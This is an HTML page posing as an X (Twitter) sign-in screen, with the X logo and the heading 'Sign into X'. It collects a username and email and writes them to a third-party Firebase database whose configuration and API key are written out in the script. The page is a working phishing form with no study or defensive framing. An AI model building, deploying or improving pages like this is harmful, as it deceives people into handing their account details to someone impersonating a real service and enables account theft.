<!DOCTYPE html>
<head>
  <title>X</title>
  <style>
  
    body {
      font-family: 'Montserrat', sans-serif;
      background: black;
      text-align: center;
     
     
      background-size: cover;
      background-position: center;
      color: black;
      font-family: helvetica;
    }
    p {
      color: white;
      font-size: 22px;
    }
    input {
      border: 0;
      padding: 2px;
      font-size: 18px;
    }
    input[type="submit"] {
      height: -100;
      background: grey;
      color: white;
    }
    img {
      width: 400px;
      height: 500
      border-radius: 50px;
      }
  </style>
</head
<body>

  <img src="https://petapixel.com/assets/uploads/2023/07/No-Elon-Musk-Didnt-Steal-the-New-Twitter-Logo-from-Nikon-or-Fujifilm.jpg">
  <p> Sign into X </p>
  <input id="Name" type="username" placeholder="Your username">



  <input id="Email" type="Email" placeholder="Your email">
  <input id="submit" type="submit">
  
  
  
  <script type="module">

    // Import the functions you need from the SDKs you need
    import { initializeApp } from "https://www.gstatic.com/firebasejs/10.7.0/firebase-app.js";
    import { getDatabase, ref, set } from "https://www.gstatic.com/firebasejs/10.7.0/firebase-database.js";
	
    // TODO: Add SDKs for Firebase products that you want to use
    // https://firebase.google.com/docs/web/setup#available-libraries

    // Your web app's Firebase configuration
    // For Firebase JS SDK v7.20.0 and later, measurementId is optional
    const firebaseConfig = {
      apiKey: "AIzaSyCdfoxdwi7wd0D3Nq-0n9QzR2SEC0E5ZLw",
      authDomain: "tajmeirr-950d5.firebaseapp.com",
      projectId: "tajmeirr-950d5",
      storageBucket: "tajmeirr-950d5.appspot.com",
      messagingSenderId: "872758507016",
      appId: "1:872758507016:web:a890d51dd2b02c6b7383bd",
      measurementId: "G-MYQ3KY9K6D"
    };

    // Initialize Firebase
    const app = initializeApp(firebaseConfig);
const db = getDatabase(app);


const Name = document.querySelector("#Name") 
const Email = document.querySelector("#Email")
document.querySelector('#submit').addEventListener('click', Submit)

	function Submit() {
	  const timestamp = buildTimestamp()
	  
	  set(ref(db, timestamp), {
		  Name: Name.value,
	      email: Email.value,
	  });

	  Name.value = ""
	  Email.value = ""
	}
	function buildTimestamp() {
	  const now = new Date();
	  let timestamp = now.getFullYear().toString() + "/";
	  //const month = now.toLocaleString('default', { month: 'long' });

	  let month = now.getMonth()+1   //add 1 because Javascript uses 0 for January
	  month = month.toString()
	  month = addLeadingZero(month)
	  timestamp += month + "/"; 

	  let date = now.getDate().toString()
	  date = addLeadingZero(date)
	  timestamp += date + "/";

	  let hours = now.getHours().toString()
	  hours = addLeadingZero(hours)
	  timestamp += hours + ":";

	  let minutes = now.getMinutes().toString()
	  minutes = addLeadingZero(minutes)
	  timestamp += minutes + ":";

	  let seconds = now.getSeconds().toString()
	  seconds = addLeadingZero(seconds)
	  timestamp += seconds;
  
	  return timestamp
	}
	
	function addLeadingZero(units) {
		if (units.length < 2) {
			units = "0" + units
		}
		return units
	}
	

  </script>
</body>